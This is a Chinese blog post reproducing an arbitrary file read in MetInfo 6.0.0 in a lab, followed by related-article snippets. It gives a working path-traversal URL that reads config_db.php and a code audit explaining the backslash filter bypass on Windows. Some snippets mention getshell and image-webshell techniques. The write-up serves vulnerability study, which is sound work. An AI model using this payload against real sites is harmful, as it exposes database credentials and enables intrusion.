[漏洞复现]metinfo6.0.0任意文件读取

最新推荐文章于 2026-06-21 14:25:50 发布
原创 最新推荐文章于 2026-06-21 14:25:50 发布 · 301 阅读 · 1 ·
本内容遵循CC 4.0 BY-SA版权协议
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
GEO检测
标签
#网络安全

环境:

OS:windows server 2016

WEB SERVER:PHPStudy pro

CMS:MetInfo6.0.0

PHP版本:php5.3.29

环境搭建:

下载metinfo6.0.0源码包

地址:MetInfo历史版本与文件

解压源码包并且初始化网站

漏洞点:

/include/thumb.php

POC

/include/thumb.php?dir=http\..\..\config\config_db.php

注意:该POC仅在windows环境中生效

代码审计

打开源码包,找到app/system/include/module/old_thumb.class.php

$dir = str_replace(array('../','./'), '', $_GET['dir']);
​
​
        if(substr(str_replace($_M['url']['site'], '', $dir),0,4) == 'http' && strpos($dir, './') === false){
            header("Content-type: image/jpeg");
            ob_start();
            readfile($dir);
            ob_flush();
            flush();
            die;
        }

接收到了get提交的参数dir,并且将字符.././进行了替换

if语句中,又将检查字符串的前4个字符是否等于http且是否包含./字符,如果是,则返回false

所以我们在payload中使用..\字符串用来避开检测,这也就是为什么只能在windows服务器生效的原因

metinfo_6.0.0 任意文件读取漏洞复现
薛定谔嘚喵博客
05-04 1256
MetInfo是一套使用PHP和Mysql开发的内容管理系统。MetInfo 6.0.0~6.1.0版本中的 old_thumb.class.php文件存在任意文件读取漏洞。攻击者可利用漏洞读取网站上的敏感文件。
文件读取漏洞复现Metinfo 6.0.0
m0_56578216的博客
08-31 1173
安装phpstudy,下载MetInfo 6.0.0版本软件,复制到phpstudy目录下的www目录中。
metinfo 6.0.0任意文件读取漏洞复现
SUPER131110的博客
09-01 596
设置了过滤条件,但是只设置了过滤"../"和“./”和请求头部是“http”开始,这样的过滤显然太简单了,我们可以用.\进行绕过构造payload。- 涉及的版本或软件(CMS版本、浏览器版本等)dir直接由_GET[‘dir’]传递进来。重现攻击过程所需的 payload。metinfo任意文件读取漏洞。简要解释漏洞产生的原因。打补丁,升级,上设备。
Metinfo v6.0.0 后台getshell
公众号shadow sock7
10-21 4086
这个漏洞在v5.3.19同样存在,不过前提是需要后台管理员的权限。但是如果是在v5.3.19,可以结合之前的管理员任意密码重置漏洞getshell。 Metinfo v5.3.19: 如文章中所说,这里的poc是: http://localhost/admin/column/save.php? name=123 &action=editor &foldername=upload &...
metinfo_6.0.0_file-read 任意文件读取漏洞复现
qq_45953122的博客
08-31 788
MetInfo 是一套使用PHP 和MySQL 开发的内容管理系统。MetInfo 6.0.0 ~ 6.1.0 版本中的 /app/system/include/module/old_thumb.class.php 文件存在任意文件读取漏洞。攻击者可利用漏洞读取网站上的敏感文件。
漏洞复现Metinfo6.0.0任意文件读取漏洞复现
过期的秋刀鱼
11-05 1643
dir变量接受来自$_GET[‘dir’]传递进来的值,用了str_replace函数做替换,将。漏洞简介:MetInfo是一套使用PHP和MySQL开发的内容管理系统,其中的。文件存在任意文件读取漏洞,攻击者可利用该漏洞读取网站的敏感文件。漏洞名称:MetInfo任意文件读取。影响版本:MetInfo 6.0.0
漏洞复现Metinfo6.0.0任意文件读取
过期的秋刀鱼
08-31 3425
dir变量接受来自$_GET[‘dir’]传递进来的值,用了str_replace函数做替换,将。漏洞简介:MetInfo是一套使用PHP和MySQL开发的内容管理系统,其中的。文件存在任意文件读取漏洞,攻击者可利用该漏洞读取网站的敏感文件。漏洞名称:MetInfo任意文件读取。影响版本:MetInfo 6.0.0
metinfo 6.0.0 任意文件读取漏洞复现
一个努力学习网安的小牛马
11-14 404
环境为mrtinfo 6.0.0
[文件读取]metinfo_6.0.0 任意文件读取漏洞复现
wj33333的博客
11-14 497
MetInfo 是一套使用PHP 和MySQL 开发的内容管理系统。MetInfo 6.0.0 版本中的。文件存在任意文件读取漏洞。攻击者可利用漏洞读取网站上的敏感文件。
metinfo 6.0 任意文件读取漏洞
浅笑996的博客
12-20 2119
一、 启动环境 1.双击运行桌面phpstudy.exe软件 2.点击启动按钮,启动服务器环境 二、代码审计 1.双击启动桌面Seay源代码审计系统软件 2.点击新建项目按钮,弹出对画框中选择(C:\phpStudy\WWW\metinfo),点击确定 漏洞分析 1.点击展开左侧app\system\include\module\目录,在弹出的下拉列表中双击old_thumb.class.ph...
metinfo __ 6.0.0 __ file-read
cgjil的博客
09-12 405
MetInfo 是一套使用PHP 和MySQL 开发的内容管理系统。MetInfo 6.0.0 ~ 6.1.0 版本中的。文件存在任意文件读取漏洞。攻击者可利用漏洞读取网站上的敏感文件。
记一次MetInfo6.0.0文件包含漏洞复现
weixin_55404107的博客
10-20 2109
进行漏洞复现读取敏感文件
php5.3.29 漏洞修复,php5.3.29频繁异常退出,导致访问php404
weixin_35735370的博客
03-23 526
系统版本:CentOS release 6.8 (Final)内核:2.6.32-696.10.2.el6.x86_64php版本:php5.3.29编译参数:‘./configure’ ‘–prefix=/www/server/php/build’ ‘–enable-fpm’ ‘–with-fpm-user=www’ ‘–with-fpm-group=www’ ‘–with-config-fil...
PHP5.3.29 multipart/form-data 远程DOS漏洞 修复方法
iiiiiiiiiiii9的专栏
01-19 3040
缘由PHP Multipartform-data远程DOS攻击漏洞,恶意构造的请求会导致服务器的cpu使用率达到100%。全版本受影响,危害严重。请尽快修复漏洞。受影响的软件及系统:PHP 5.0.05.0.5PHP 5.1.05.1.6PHP 5.2.05.2.17PHP 5.3.05.3.29PHP 5.4.05.4.40PHP 5.5.05.5.24PHP
Metinfo6.0.0任意文件读取漏洞复现
weixin_56537388的博客
08-31 809
在\MetInfo6.0.0\app\system\include\module\的old_thumb.class.php文件。可以看到这里对./进行了严格的过滤,但是却忽略了在Windows下还可以用…这里前面已经审计过代码了,就直接上payload了。下载Metinfo6.0.0。配置随便写,自己记住就行。
[漏洞复现] metinfo_6.0.0_file-read(任意文件读取)
yuan_boss的博客
08-31 1393
MetInfo 6.0.0版本链接下载:https://pan.baidu.com/s/16kYqawGMVisbo600c1atzQ?MetInfo 是一套使用PHP 和MySQL 开发的内容管理系统。MetInfo 6.0.0 版本中的。本次漏洞复现仅供学习使用,如若非法他用,与平台和本文作者无关,需自行负责!文件存在任意文件读取漏洞。攻击者可利用漏洞读取网站上的敏感文件。
MetInfo 6.0.0任意文件读取漏洞(CVE-2018-13012)复现与深度分析
最新发布
weixin_34056162的博客
06-21 288
路径遍历(Path Traversal)是Web应用安全中常见的高危漏洞,其核心原理在于应用程序未对用户输入的文件路径进行充分验证,导致攻击者能够通过构造特殊的路径序列(如../)访问预期目录之外的文件系统。这种漏洞的技术价值在于,它往往源于开发过程中对用户输入过于信任,以及采用了不安全的黑名单过滤机制。在工程实践中,路径遍历漏洞的利用可以导致敏感信息泄露,如读取系统配置文件、数据库凭证或应用程序源码,为后续攻击提供关键信息。典型的应用场景包括文件下载、图片预览、日志查看等接收文件路径参数的功能模块。本文以
漏洞复现Metinfo5.0.4任意文件包含漏洞复现
过期的秋刀鱼
11-04 1067
文件夹中有个新建文件shell.php,即可用蚁剑连接。下放入一张没有木马的图片,使用另一种方式制作图片木马。,当我们直接包含图片的时候,这段代码就会被执行。复制得到的base64编码格式的php代码。该段代码的含义是,在当前目录下创建一个名为。把POST请求体中的变量放到url中提交。,然后在下面写入php代码,点击send。上传图片木马,通过文件包含的方式去访问。bp拦截得到php源码的数据包。使用文件包含的方式去访问图片。该环境的文件上传点在。但是上传文件会失败,拿到webshell。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值